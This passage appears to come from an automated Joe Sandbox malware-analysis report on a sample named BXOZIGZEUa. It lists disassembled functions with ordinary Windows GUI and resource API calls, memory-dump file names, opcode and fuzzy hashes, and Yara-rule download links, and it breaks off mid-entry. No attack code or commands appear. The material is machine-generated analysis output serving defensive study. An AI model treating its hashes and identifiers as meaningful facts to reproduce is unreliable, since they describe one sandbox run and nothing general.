SetWindowLongW.USER32(?,000000F0,00000000), ref: 0020B87F
IsWindow.USER32(?), ref: 0020B88D
SetWindowLongW.USER32(?,000000F0,?), ref: 0020B89D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: fa9e640b32a09cf4f1d8e371b0b6aa0e37cfc410c9a796759b6c276dd0041007
Instruction ID: b9fc2b2404567fa569aeeaee83014421fdd2407cd1a198414ad7005ad36120a8
Opcode Fuzzy Hash: fa9e640b32a09cf4f1d8e371b0b6aa0e37cfc410c9a796759b6c276dd0041007
Instruction Fuzzy Hash: 7101D172114304BFDB11AB759C88E9AB7ACEF44330B200758F466E62E2DF30E8008A50

Function 001E8758 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,00000002,00000002), ref: 001E8794
InvalidateRect.USER32(?,?,00000001), ref: 001E87A5
UpdateWindow.USER32(?), ref: 001E87AE
SetRectEmpty.USER32(?), ref: 001E87BB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$EmptyInflateInvalidateUpdateWindow
String ID:
API String ID: 3040190709-0
Opcode ID: 867bede2d4b2097b2b7807c9bbf3c7e992eacaff510e521f15efd1803425b11f
Instruction ID: 794220e71c001a087ac34426d229c1b05e0a0185c43abedadfbf771fd8d8a139
Opcode Fuzzy Hash: 867bede2d4b2097b2b7807c9bbf3c7e992eacaff510e521f15efd1803425b11f
Instruction Fuzzy Hash: EC0196B15001059BCF00DFA9DCC9ADA7BBCFB09321F100265AD49AF0A6CF705945CF60

Function 001DCA92 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,000000F0), ref: 001DCAB8
LoadResource.KERNEL32(?,00000000), ref: 001DCAC4
LockResource.KERNEL32(00000000), ref: 001DCAD1
FreeResource.KERNEL32(00000000,00000000), ref: 001DCAED

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 00be0153f45f5edbb9f405a981a2ce1cab9825bc21dee49a4f41789c3f9c211c
Instruction ID: 513dbac2216247d37de8f62aec83e7e0d246f0f786fd2bb478a8090d4a8e729f
Opcode Fuzzy Hash: 00be0153f45f5edbb9f405a981a2ce1cab9825bc21dee49a4f41789c3f9c211c
Instruction Fuzzy Hash: 12F0C23724125B6BC7119FE5ACC8E6FB6ACEF943A0705443ABA05A7341EF70DD01C6A0

Function 00299D25 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00299D2C
LoadCursorW.USER32(00000000,00007F00), ref: 00299D93
SetCursor.USER32(00000000), ref: 00299D9A
DestroyIcon.USER32(00000000), ref: 00299DA6

Part of subcall function 002B87D9: __EH_prolog3.LIBCMT ref: 002B87E0
Part of subcall function 002B87D9: DeleteDC.GDI32(?), ref: 002B8802

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CursorH_prolog3$DeleteDestroyIconLoad
String ID:
API String ID: 2313811042-0
Opcode ID: 6c779b19436db6658df08a61d2f6f21faab959e0d39681afebfd476b2990106c
Instruction ID: 2a4d2492af68e3df100c60bc49002ad2de139bfcbe0c631eb494867f2a6f5c82
Opcode Fuzzy Hash: 6c779b19436db6658df08a61d2f6f21faab959e0d39681afebfd476b2990106c
Instruction Fuzzy Hash: 8E01A9302103409FCB65BF64C98ABAEBBA6AF50710F14040CE0AE4A2A2CFB16940CB61

Function 001DCE25 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001DCE3A
GetParent.USER32(?), ref: 001DCE49
GetParent.USER32(?), ref: 001DCE5F
SetFocus.USER32(?,00000000), ref: 001DCE75

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$Focus
String ID:
API String ID: 384096180-0
Opcode ID: 4fb6c0d724aa15c209f0377aff1d377e3e3a504dd6ab2faca5df657d73e0e090
Instruction ID: 3829d2f845e8fe3064e80d4d608a2aa0577697caa0d64a69f09299982e35657c
Opcode Fuzzy Hash: 4fb6c0d724aa15c209f0377aff1d377e3e3a504dd6ab2faca5df657d73e0e090
Instruction Fuzzy Hash: E4F0ECB26107419FCB217776EC08A6B7BAABFD4311F06096AB48586661EF74D800CA50

Function 0022F635 Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000005,00000000,?,?,?,?,0021DAB9,?,?), ref: 0022F651
LoadResource.KERNEL32(?,00000000,?,?,?,?,0021DAB9,?,?), ref: 0022F659
LockResource.KERNEL32(00000000,?,?,?,?,0021DAB9,?,?), ref: 0022F666
FreeResource.KERNEL32(00000000,00000000,0021DAB9,?,?,?,?,?,0021DAB9,?,?), ref: 0022F67E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: a1d676b5f708da00d66cd3059209edae46027ea980d5d4289026dc83b778ecb7
Instruction ID: 05e3887804cc2ee51072cad0abd25b60ada968b9348143d2f9a5d526c7d74b7f
Opcode Fuzzy Hash: a1d676b5f708da00d66cd3059209edae46027ea980d5d4289026dc83b778ecb7
Instruction Fuzzy Hash: E5F09036501115BB87016BE5AD8CD9FBA6DDF952A07014029F60997261DA74CD008B60

Function 002A02B8 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66

UpdateWindow.USER32(?), ref: 002A02E5
UpdateWindow.USER32(?), ref: 002A02F1
SetRectEmpty.USER32(?), ref: 002A02FD
SetRectEmpty.USER32(?), ref: 002A0306

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$EmptyRectUpdate$Show
String ID:
API String ID: 1262231214-0
Opcode ID: 3ebabff35a5f4d4aeacddd107cb6985238add707ae281cb479c5be7695f217b8
Instruction ID: c0304cd947ef3ac08cbdc6d2b0d6fdb369d5705c699402d84a32658d3a21a406
Opcode Fuzzy Hash: 3ebabff35a5f4d4aeacddd107cb6985238add707ae281cb479c5be7695f217b8
Instruction Fuzzy Hash: ECF08C32260B159BE722AF25EC84F47B7E8BF85711F0A0569E5D8A7170CF71E811CAA0

Function 0026547F Relevance: 6.0, APIs: 4, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0026549A
SetRectEmpty.USER32(?), ref: 002654A0
SetRectEmpty.USER32(?), ref: 002654A6
SetRectEmpty.USER32(?), ref: 002654AC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 7067d9f544fd870b1c9e2b448d6c2898b3337efe5153f45813ec9a1c26a1887a
Instruction ID: 998f6ddc9753d47cf184f8bc3421db027df468259a4b9b6354392cffe69af492
Opcode Fuzzy Hash: 7067d9f544fd870b1c9e2b448d6c2898b3337efe5153f45813ec9a1c26a1887a
Instruction Fuzzy Hash: 05E0C9B64007199AC730AB6AE884AC7B3ECAF94310B11091EE587C3514DB75F586CF90

Function 002190B3 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 002193A7

Part of subcall function 002186AD: __EH_prolog3_GS.LIBCMT ref: 002186B4

Strings

83/, xrefs: 00219177, 002192D1, 00219330

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3_Parent
String ID: 83/
API String ID: 383333065-2323854675
Opcode ID: 3020e922f02ffe43fec6b0793425d29f2350f4f2ba9f7c08efc97a68fc61e005
Instruction ID: 9533301757e19a4b93be7f1cbe6ab3012823481d1f1f1b7bdb650784c913e1fa
Opcode Fuzzy Hash: 3020e922f02ffe43fec6b0793425d29f2350f4f2ba9f7c08efc97a68fc61e005
Instruction Fuzzy Hash: D981A530310601AFDB15AF64C899AFEB7EAAF68740F04442EF55A8B291DF71A9D0CB51

Function 0023321D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 227COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 002332FA
__floor_pentium4.LIBCMT ref: 0023330F

Strings

TR/, xrefs: 00233434

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: __floor_pentium4
String ID: TR/
API String ID: 4168288129-3081264625
Opcode ID: 50427a281a5c2f6c1b0f593ea240900d4128fc95ee498b0d33daec387b89ea6b
Instruction ID: d23ce04919c075107ec29adbdd346b58865d1a703e729dba032d1dd59c0a84c1
Opcode Fuzzy Hash: 50427a281a5c2f6c1b0f593ea240900d4128fc95ee498b0d33daec387b89ea6b
Instruction Fuzzy Hash: 1C81D6B0E1060AEBCB05DFA4D1856EDBBB4FF44300F20C19EE995A6291DB31DB61CB90

Function 0021638E Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 215COMMON

Download Yara Rule

APIs

Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F

GetWindowRect.USER32(?,?), ref: 00216534

Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66

Part of subcall function 002157F1: IsWindowVisible.USER32(?), ref: 0021580D
Part of subcall function 002157F1: MapWindowPoints.USER32(?,?,?,00000002), ref: 00215846
Part of subcall function 002157F1: GetWindowLongW.USER32(?,000000F0), ref: 00215890

Strings

83/, xrefs: 002163E5, 0021643B, 002164FE

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$LongPointsRectShowVisible
String ID: 83/
API String ID: 705879729-2323854675
Opcode ID: 83e93fbdf595685d6711ae4f20779f291d76175125c906bc17fd2965c5918f50
Instruction ID: 032abb7c4d61046aae72a36453eff5540b97fe35ab217687d41a3e265e65ceea
Opcode Fuzzy Hash: 83e93fbdf595685d6711ae4f20779f291d76175125c906bc17fd2965c5918f50
Instruction Fuzzy Hash: 60811671A1021AAFCB18DFA8C9C99EEFBF5FB18314F10452DE515A7245CB31AD90CB64

Function 001EA106 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001EA33A
GetParent.USER32(?), ref: 001EA37D

Strings

To/, xrefs: 001EA38A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent
String ID: To/
API String ID: 975332729-3711964495
Opcode ID: 7dde3156e21412ac5fa7e0c1e6ba82ffa7732b91355ff6609325ee7a37915d32
Instruction ID: 71e5737921ba35d4501a37d12f63cfa4f7fdb19e547b23d93126eda7aa94c719
Opcode Fuzzy Hash: 7dde3156e21412ac5fa7e0c1e6ba82ffa7732b91355ff6609325ee7a37915d32
Instruction Fuzzy Hash: C661C675A04B019FC722AF32E46669A77E8FF59344F11492DD18AC2365FB31B860CF82

Function 002143CE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002143D8

Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88

Part of subcall function 0024ADE5: __EH_prolog3_GS.LIBCMT ref: 0024ADEF

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

<L/, xrefs: 002144E1, 002144F2
\w/, xrefs: 0021447F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3_$Exception@8H_prolog3Throw_malloc
String ID: <L/$\w/
API String ID: 3649189929-1224564559
Opcode ID: b29f371995c9335eb91e782a99e6c360028c034b0f9ae40016fb4e7dab25a8ef
Instruction ID: 7f0faeeff4ee09df4512579d2e3014838aa537b726d38e24c375102a4b2a0551
Opcode Fuzzy Hash: b29f371995c9335eb91e782a99e6c360028c034b0f9ae40016fb4e7dab25a8ef
Instruction Fuzzy Hash: 73518170A102199BCF39AF248C82EE9B3F6AF75710F640299E51AA71D1DB309DD0CB50

Function 001DF81D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 001DF457: GetModuleHandleW.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00215927), ref: 001DF4CE
Part of subcall function 001DF457: GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 001DF4DE

Part of subcall function 001DEAAD: __EH_prolog3.LIBCMT ref: 001DEAB4

GetWindowRect.USER32(?,?), ref: 001DF890
SetWindowRgn.USER32(?,00000000,00000001), ref: 001DF8DD

Strings

, xrefs: 001DF8B9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$AddressH_prolog3HandleModuleProcRect
String ID:
API String ID: 2106468464-3916222277
Opcode ID: a29eccdda434ff1d1f882f5e4af2ba05f83bfd3823f42aebb07464dca9765b77
Instruction ID: c2025bda7af308a5833e3da653226809ce89fdae3ecb9a0ecea014725db81e66
Opcode Fuzzy Hash: a29eccdda434ff1d1f882f5e4af2ba05f83bfd3823f42aebb07464dca9765b77
Instruction Fuzzy Hash: 94513730A00708EFCB26DF65C894AEEFBF5FF98344F20452FE85A96251DB309A41DA51

Function 00217B17 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00217B21

Part of subcall function 0024EBDB: __EH_prolog3.LIBCMT ref: 0024EBE2

Part of subcall function 0024E8FE: __EH_prolog3.LIBCMT ref: 0024E905

Strings

MDITabsState, xrefs: 00217BD5
%sMDIClientArea-%d, xrefs: 00217B63

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$H_prolog3_catch
String ID: %sMDIClientArea-%d$MDITabsState
API String ID: 1670334802-353449602
Opcode ID: 68ca411dc97b5656e2b5b7e71e3578814924ecdd75f1d7ec5483f91ace2b62da
Instruction ID: 5834f0b773aa4b5d1061968e3676d5bd36004e80ead87705793b5f3b26235fe5
Opcode Fuzzy Hash: 68ca411dc97b5656e2b5b7e71e3578814924ecdd75f1d7ec5483f91ace2b62da
Instruction Fuzzy Hash: 57517C30914209EFCF05DFA4C885FEEBBB5AF65704F144089F11A67291CB719E94CBA2

Function 001FEAFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

H., xrefs: 001FEB92
h., xrefs: 001FEBA6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: H.$h.
API String ID: 0-2090196884
Opcode ID: 05302d17bae80c408383f07241ff50dd253442adea26bfc72040be3cb171a748
Instruction ID: 6abebd667a385f8db633aa697857e185fa05fc581244cd3471edc6c3c75f33bb
Opcode Fuzzy Hash: 05302d17bae80c408383f07241ff50dd253442adea26bfc72040be3cb171a748
